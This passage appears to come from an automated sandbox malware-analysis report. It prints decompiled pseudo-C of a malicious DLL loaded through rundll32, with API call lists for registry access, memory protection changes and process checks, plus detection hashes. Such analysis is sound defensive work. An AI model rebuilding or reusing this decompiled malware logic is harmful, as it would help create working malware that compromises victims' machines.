						_v24 = _t47;
						if(_t47 != 0) {
							L6:
							_t53 = 0;
							goto L12;
						}
						_t53 = 8;
						goto L16;
					}
					_v8 = _v8 + 1;
					goto L6;
					L12:
				} while (WaitForSingleObject( *0x100a30c, 0) == 0x102);
				goto L16;
			}

















                          0x010071b6
                          0x010071d0
                          0x010071d3
                          0x010071d6
                          0x010071d9
                          0x010071dc
                          0x010071e2
                          0x010071e6
                          0x010072c0
                          0x010072c4
                          0x010072c4
                          0x010071ef
                          0x010071f6
                          0x010071fb
                          0x01007200
                          0x010072b5
                          0x010072b8
                          0x00000000
                          0x010072be
                          0x01007206
                          0x01007209
                          0x01007210
                          0x0100721a
                          0x01007223
                          0x01007229
                          0x01007231
                          0x01007269
                          0x010072a3
                          0x010072a9
                          0x010072ab
                          0x010072ab
                          0x010072ad
                          0x010072b0
                          0x00000000
                          0x010072b0
                          0x0100727e
                          0x01007283
                          0x01007287
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01007287
                          0x01007236
                          0x01007245
                          0x00000000
                          0x00000000
                          0x0100724a
                          0x01007253
                          0x01007256
                          0x0100725b
                          0x01007260
                          0x0100723b
                          0x0100723b
                          0x00000000
                          0x0100723b
                          0x01007264
                          0x00000000
                          0x01007264
                          0x01007238
                          0x00000000
                          0x01007289
                          0x01007296
                          0x00000000

                          APIs
                          • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,01007168,?), ref: 010071DC
                            • Part of subcall function 01006D63: RtlAllocateHeap.NTDLL(00000000,00000000,01005D7B), ref: 01006D6F
                          • RegEnumKeyExA.KERNEL32(?,?,?,01007168,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,01007168), ref: 01007223
                          • WaitForSingleObject.KERNEL32(00000000,?,?,?,01007168,?,01007168,?,?,?,?,?,01007168,?), ref: 01007290
                          • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,01007168,?), ref: 010072B8
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                          • String ID: !s
                          • API String ID: 3664505660-1801701826
                          • Opcode ID: 00c7b518cc5c3611e5c0e3e1a4434b4597aae44be212126ff7b8f8c16c6f9958
                          • Instruction ID: 5542007e202ade8032accffe2c8ed87331306c6ebc5d9256e97c82c81aa152e5
                          • Opcode Fuzzy Hash: 00c7b518cc5c3611e5c0e3e1a4434b4597aae44be212126ff7b8f8c16c6f9958
                          • Instruction Fuzzy Hash: D4316971D0021AAFEF23AFA9DC849EEFFB9EB44700F104066F5D1B2191D2791A908B91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01003D2C Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 57%
                          			E01003D2C(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t63;
				CHAR* _t67;
				CHAR* _t68;
				char* _t69;
				void* _t70;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E01003CFD();
				if(_t21 != 0) {
					_t59 =  *0x100a2fc; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x100a2fc = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x100a178(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E0100389E( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x100a348; // 0x428d5a8
					if( *0x100a2fc > 5) {
						_t8 = _t26 + 0x100b5c5; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x100b9fd; // 0x44283a44
						_t27 = _t7;
					}
					E01006B80(_t27, _t27);
					_t31 = E010076BB(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t63 = 5;
					if(_t54 != _t63) {
						 *0x100a310 =  *0x100a310 ^ 0x81bbe65d;
						_t32 = E01006D63(0x60);
						 *0x100a3cc = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x100a3cc; // 0x52995b0
							_t70 = _t70 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x100a3cc; // 0x52995b0
							 *_t51 = 0x100b827;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x100a2d8, 0, 0x43);
							 *0x100a368 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x100a2fc; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x100a348; // 0x428d5a8
								_t13 = _t58 + 0x100b552; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x1009287);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E01003365( ~_v8 &  *0x100a310, 0x100a00c); // executed
								_t42 = E01001645(0, _t55, _t63, 0x100a00c); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E01003981(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t67 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E0100661D(_t61, _t67, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t67;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E0100529C(__eflags,  &(_t67[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t68 = _v12;
						if(_t68 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x100a17c(); // executed
							}
							goto L34;
						}
						_t69 =  &(_t68[4]);
						do {
						} while (E01007928(_t63, _t69, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}































                          0x01003d2c
                          0x01003d36
                          0x01003d39
                          0x01003d3c
                          0x01003d3f
                          0x01003d46
                          0x01003d48
                          0x01003d54
                          0x01003d56
                          0x01003d56
                          0x01003d5f
                          0x01003d65
                          0x01003d6a
                          0x01003d84
                          0x01003d90
                          0x01003d92
                          0x01003d97
                          0x01003da1
                          0x01003da1
                          0x01003d99
                          0x01003d99
                          0x01003d99
                          0x01003d99
                          0x01003da8
                          0x01003db5
                          0x01003dbc
                          0x01003dc1
                          0x01003dc1
                          0x01003dca
                          0x01003dcd
                          0x01003df3
                          0x01003dff
                          0x01003e04
                          0x01003e09
                          0x01003e0b
                          0x01003e37
                          0x01003e39
                          0x01003e0d
                          0x01003e11
                          0x01003e16
                          0x01003e1b
                          0x01003e22
                          0x01003e28
                          0x01003e2d
                          0x01003e33
                          0x01003e3a
                          0x01003e3c
                          0x01003e3e
                          0x01003e4d
                          0x01003e53
                          0x01003e58
                          0x01003e5a
                          0x01003e8a
                          0x01003e8c
                          0x01003e5c
                          0x01003e5c
                          0x01003e62
                          0x01003e6f
                          0x01003e75
                          0x01003e75
                          0x01003e7d
                          0x01003e86
                          0x01003e8d
                          0x01003e8f
                          0x01003e91
                          0x01003e98
                          0x01003ea5
                          0x01003eaa
                          0x01003eaf
                          0x01003eb1
                          0x01003eb3
                          0x00000000
                          0x00000000
                          0x01003eb5
                          0x01003eba
                          0x01003ebc
                          0x01003ec3
                          0x01003ec7
                          0x01003eca
                          0x01003edf
                          0x01003ee3
                          0x01003ee8
                          0x00000000
                          0x01003ee8
                          0x01003ecc
                          0x01003ece
                          0x00000000
                          0x00000000
                          0x01003ed9
                          0x01003edb
                          0x01003edd
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01003edd
                          0x01003ec0
                          0x01003ec0
                          0x01003e91
                          0x01003dcf
                          0x01003dcf
                          0x01003dd4
                          0x01003eea
                          0x01003eef
                          0x01003ef7
                          0x01003ef7
                          0x00000000
                          0x01003eef
                          0x01003dda
                          0x01003ddd
                          0x01003de7
                          0x01003dee
                          0x00000000
                          0x01003eff
                          0x01003eff
                          0x01003f02
                          0x01003f06
                          0x01003f06

                          APIs
                            • Part of subcall function 01003CFD: GetModuleHandleA.KERNEL32(4C44544E,00000000,01003D44,00000001), ref: 01003D0C
                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 01003DC1
                            • Part of subcall function 01006D63: RtlAllocateHeap.NTDLL(00000000,00000000,01005D7B), ref: 01006D6F
                          • memset.NTDLL ref: 01003E11
                          • RtlInitializeCriticalSection.NTDLL(05299570), ref: 01003E22
                            • Part of subcall function 0100529C: memset.NTDLL ref: 010052B6
                            • Part of subcall function 0100529C: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 010052FC
                            • Part of subcall function 0100529C: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 01005307
                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 01003E4D
                          • wsprintfA.USER32 ref: 01003E7D
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                          • String ID:
                          • API String ID: 4246211962-0
                          • Opcode ID: 687ccc385b6714cf9a49418e42a2cdb9ef604c27618ff52eb3e4800adc3195d2
                          • Instruction ID: 3d2ad865c8c5f3e5f67b95f9b038363f2c61a6a36f611c84ca8ab7c6ae7ba67e
                          • Opcode Fuzzy Hash: 687ccc385b6714cf9a49418e42a2cdb9ef604c27618ff52eb3e4800adc3195d2
                          • Instruction Fuzzy Hash: 09519171B00315EFFB63EBA8DC88AAE37A8BB08700F0445B6E5C5DB1C5D6B699408B50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010019E2 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 22%
                          			E010019E2(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E01006D63(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E01006C2C(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E01006D63((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x100a318 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                          0x010019e9
                          0x010019f0
                          0x010019f5
                          0x010019f8
                          0x010019ff
                          0x01001a02
                          0x01001a05
                          0x01001a0a
                          0x01001a0f
                          0x01001b63
                          0x01001b65
                          0x01001b67
                          0x01001b6c
                          0x01001b6c
                          0x01001a15
                          0x01001a18
                          0x01001a1b
                          0x01001a1d
                          0x01001a1d
                          0x01001a21
                          0x00000000
                          0x00000000
                          0x01001a25
                          0x01001a51
                          0x01001a56
                          0x01001a58
                          0x01001a58
                          0x01001a5b
                          0x01001a5e
                          0x01001a5e
                          0x01001a60
                          0x00000000
                          0x01001a2b
                          0x01001a2d
                          0x01001a4c
                          0x01001a4c
                          0x01001a63
                          0x01001a63
                          0x01001a64
                          0x01001a64
                          0x01001a67
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01001a67
                          0x01001a31
                          0x01001a78
                          0x01001a7c
                          0x01001b56
                          0x01001b58
                          0x01001b58
                          0x01001b59
                          0x01001b5c
                          0x00000000
                          0x01001b5c
                          0x01001a85
                          0x01001a96
                          0x01001a9a
                          0x01001b52
                          0x00000000
                          0x01001b52
                          0x01001aa0
                          0x01001aa3
                          0x01001aa7
                          0x01001aab
                          0x01001ab0
                          0x01001b48
                          0x01001b48
                          0x00000000
                          0x01001b4e
                          0x01001abb
                          0x01001ac4
                          0x01001ad8
                          0x01001adf
                          0x01001af4
                          0x01001afa
                          0x01001b02
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01001b04
                          0x01001b04
                          0x01001b04
                          0x01001b0b
                          0x01001b13
                          0x00000000
                          0x00000000
                          0x01001b15
                          0x01001b1e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01001b20
                          0x01001b22
                          0x01001b25
                          0x01001b25
                          0x01001b28
                          0x01001b2c
                          0x01001b2f
                          0x01001b35
                          0x01001b38
                          0x01001b3f
                          0x00000000
                          0x01001abb
                          0x01001a36
                          0x01001a3e
                          0x01001a44
                          0x01001a46
                          0x01001a46
                          0x01001a49
                          0x01001a4b
                          0x00000000
                          0x01001a4b
                          0x01001a25
                          0x01001a6b
                          0x01001a70
                          0x01001a72
                          0x01001a72
                          0x01001a75
                          0x01001a75
                          0x00000000

                          APIs
                            • Part of subcall function 01006D63: RtlAllocateHeap.NTDLL(00000000,00000000,01005D7B), ref: 01006D6F
                          • lstrcpy.KERNEL32(69B25F45,00000020), ref: 01001ADF
                          • lstrcat.KERNEL32(69B25F45,00000020), ref: 01001AF4
                          • lstrcmp.KERNEL32(00000000,69B25F45), ref: 01001B0B
                          • lstrlen.KERNEL32(69B25F45), ref: 01001B2F
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                          • String ID:
                          • API String ID: 3214092121-3916222277
                          • Opcode ID: 86fbaf264daa4746934377e6dc30c314b255437818ca11299eb33d172e78284b
                          • Instruction ID: 443c1466c648442ba65302a63d95235a45f715d72abf7b17900fb0ce9f753d76
                          • Opcode Fuzzy Hash: 86fbaf264daa4746934377e6dc30c314b255437818ca11299eb33d172e78284b
                          • Instruction Fuzzy Hash: 5051A131A00608EFEB22CF99C4847EDBBF6FF45314F05809AE9999B281C771DA51CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0100498E Relevance: 7.6, APIs: 5, Instructions: 96synchronizationCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0100498E(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				long _t14;
				void* _t18;
				WCHAR* _t19;
				long _t20;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				WCHAR** _t32;

				_t6 =  *0x100a310; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x100a348; // 0x428d5a8
				_t3 = _t8 + 0x100b87a; // 0x61636f4c
				_t25 = 0;
				_t30 = E010011C3(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x100a34c, 1, 0, _t30);
					E01006C2C(_t30);
				}
				_t12 =  *0x100a2fc; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t14 = E0100402A(_t32, 0); // executed
					_t31 = _t14;
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t18 = E010068BD(); // executed
					if(_t18 != 0) {
						goto L12;
					}
					_t19 = StrChrW( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 =  &(_t19[1]);
					}
					_t20 = E01007928(0,  *_t32, _t19, 0); // executed
					_t31 = _t20;
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								FindCloseChangeNotification(_t25); // executed
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

















                          0x0100498f
                          0x01004996
                          0x010049a0
                          0x010049a4
                          0x010049aa
                          0x010049b9
                          0x010049c0
                          0x010049c4
                          0x010049d6
                          0x010049d8
                          0x010049d8
                          0x010049dd
                          0x010049e4
                          0x01004a3b
                          0x01004a3b
                          0x01004a41
                          0x01004a43
                          0x01004a43
                          0x01004a48
                          0x01004a4d
                          0x01004a51
                          0x01004a63
                          0x01004a63
                          0x01004a67
                          0x01004a6d
                          0x01004a6d
                          0x00000000
                          0x010049f4
                          0x010049f4
                          0x010049fb
                          0x00000000
                          0x00000000
                          0x01004a02
                          0x01004a0a
                          0x01004a0e
                          0x01004a12
                          0x01004a12
                          0x01004a1a
                          0x01004a1f
                          0x01004a23
                          0x01004a27
                          0x01004a7c
                          0x01004a82
                          0x01004a82
                          0x01004a35
                          0x01004a39
                          0x01004a70
                          0x01004a72
                          0x01004a75
                          0x01004a75
                          0x00000000
                          0x01004a72
                          0x01004a39
                          0x00000000
                          0x01004a23

                          APIs
                            • Part of subcall function 010011C3: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,05299D70,00000000,?,?,69B25F44,00000005,0100A00C,4D283A53,?,?), ref: 010011F9
                            • Part of subcall function 010011C3: lstrcpy.KERNEL32(00000000,00000000), ref: 0100121D
                            • Part of subcall function 010011C3: lstrcat.KERNEL32(00000000,00000000), ref: 01001225
                          • CreateEventA.KERNEL32(0100A34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,01007187,?,?,?), ref: 010049CF
                            • Part of subcall function 01006C2C: RtlFreeHeap.NTDLL(00000000,00000000,01005E1D,00000000,?,?,00000000), ref: 01006C38
                          • StrChrW.SHLWAPI(01007187,00000020,61636F4C,00000001,00000000,?,?,00000000,?,01007187,?,?,?), ref: 01004A02
                          • WaitForSingleObject.KERNEL32(00000000,00004E20,01007187,00000000,00000000,?,00000000,?,01007187,?,?,?), ref: 01004A2F
                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,01007187,?,?,?), ref: 01004A5D
                          • FindCloseChangeNotification.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,01007187,?,?,?), ref: 01004A75
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: ObjectSingleWait$ChangeCloseCreateEventFindFreeHeapNotificationlstrcatlstrcpylstrlen
                          • String ID:
                          • API String ID: 3294472205-0
                          • Opcode ID: 720b76b5c537524811e4f9795bde7260738c5bac5dfa1b63bf75861de9a4507a
                          • Instruction ID: 5d65becdba536d9e68b0c4cf54868bbc345e63c73fcb538be02e81fa7274f8b0
                          • Opcode Fuzzy Hash: 720b76b5c537524811e4f9795bde7260738c5bac5dfa1b63bf75861de9a4507a
                          • Instruction Fuzzy Hash: 0A215432600301ABF3339F6C9C44AAA76E9EB8A711F054665FFC1E71C5DB66D880879C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B81ECA Relevance: 7.6, APIs: 5, Instructions: 67registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B7B7A4: RegCreateKeyA.ADVAPI32(80000001,05FBB7F0,?), ref: 05B7B7B9
                            • Part of subcall function 05B7B7A4: lstrlen.KERNEL32(05FBB7F0,00000000,00000000,00000000,?,05B7A2EB,00000001,?,00000000,00000000,00000000,?,05B6109E,05B89F2C,00000008,00000003), ref: 05B7B7E2
                          • RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05B62C89,?), ref: 05B81F02
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B81F16
                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05B62C89,?), ref: 05B81F30
                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,00000000,?,?,?,05B62C89,?,?,?), ref: 05B81F4C
                          • RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,05B62C89,?,?,?), ref: 05B81F5A
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
                          • String ID:
                          • API String ID: 1633053242-0
                          • Opcode ID: db12866386a262a24507c32316ff6b74bb1e8efb0fb932b3b3bd1d781e8359cd
                          • Instruction ID: 57141cc42c17bcd2d6475f7e253fbf29547f8afc83743c4780313e15e81cdc99
                          • Opcode Fuzzy Hash: db12866386a262a24507c32316ff6b74bb1e8efb0fb932b3b3bd1d781e8359cd
                          • Instruction Fuzzy Hash: 931123B2110149BFDF01AF98DC85CBE7B6EFB88254B101466FA05A3210EB31AD55EB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7212C Relevance: 7.5, APIs: 5, Instructions: 48libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(?,?,?,?,?,05B6111D,00000000), ref: 05B7214D
                          • GetProcAddress.KERNEL32(00000000,?), ref: 05B72166
                          • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,05B6111D,00000000), ref: 05B72183
                          • IsWow64Process.KERNEL32(?,?,?,?,?,?,05B6111D,00000000), ref: 05B72194
                          • FindCloseChangeNotification.KERNEL32(?,?,?,?,05B6111D,00000000), ref: 05B721A7
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$AddressChangeCloseFindHandleModuleNotificationOpenProcWow64
                          • String ID:
                          • API String ID: 1712524627-0
                          • Opcode ID: d73e45c306ee1b24e0e7d23bd0418119e7ad78a0a0476ac2cc3544becec74940
                          • Instruction ID: 9db4a36e846a49b2a7cbed61943e127ce4db07578d3162c237c87d2267257067
                          • Opcode Fuzzy Hash: d73e45c306ee1b24e0e7d23bd0418119e7ad78a0a0476ac2cc3544becec74940
                          • Instruction Fuzzy Hash: F2015E75514208FFDB11EF55D8498BDBFB9FB856A1B305166FA05D3200EB347602CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B633A5 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualProtect.KERNEL32(?,?,00000040,?,?,?,00000000), ref: 05B633CA
                          • GetLastError.KERNEL32(?,00000000), ref: 05B633D2
                          • VirtualQuery.KERNEL32(?,?,0000001C,?,00000000), ref: 05B633E9
                          • VirtualProtect.KERNEL32(?,?,-2C9B417C,?,?,00000000), ref: 05B6340E
                          • SetLastError.KERNEL32(80000000,?,00000000), ref: 05B63417
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$ErrorLastProtect$Query
                          • String ID:
                          • API String ID: 148356745-0
                          • Opcode ID: 64305adc0db543dc23a852f07b00decfdb12b8ed64a33ef93d80c45ddaed863b
                          • Instruction ID: 24e215e1fb9a0b836789bbc3213b22fdc226e1d2d679e4bb3f27362a0e7c7ee2
                          • Opcode Fuzzy Hash: 64305adc0db543dc23a852f07b00decfdb12b8ed64a33ef93d80c45ddaed863b
                          • Instruction Fuzzy Hash: BA012572500209BFDF12AF95DC458AEBFBAFF092547008426FA01E3260EB71E914DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010074FE Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                          Download Yara Rule
                          APIs
                          • SysAllocString.OLEAUT32(80000002), ref: 0100755B
                          • SysAllocString.OLEAUT32(01003520), ref: 0100759F
                          • SysFreeString.OLEAUT32(00000000), ref: 010075B3
                          • SysFreeString.OLEAUT32(00000000), ref: 010075C1
                          Memory Dump Source
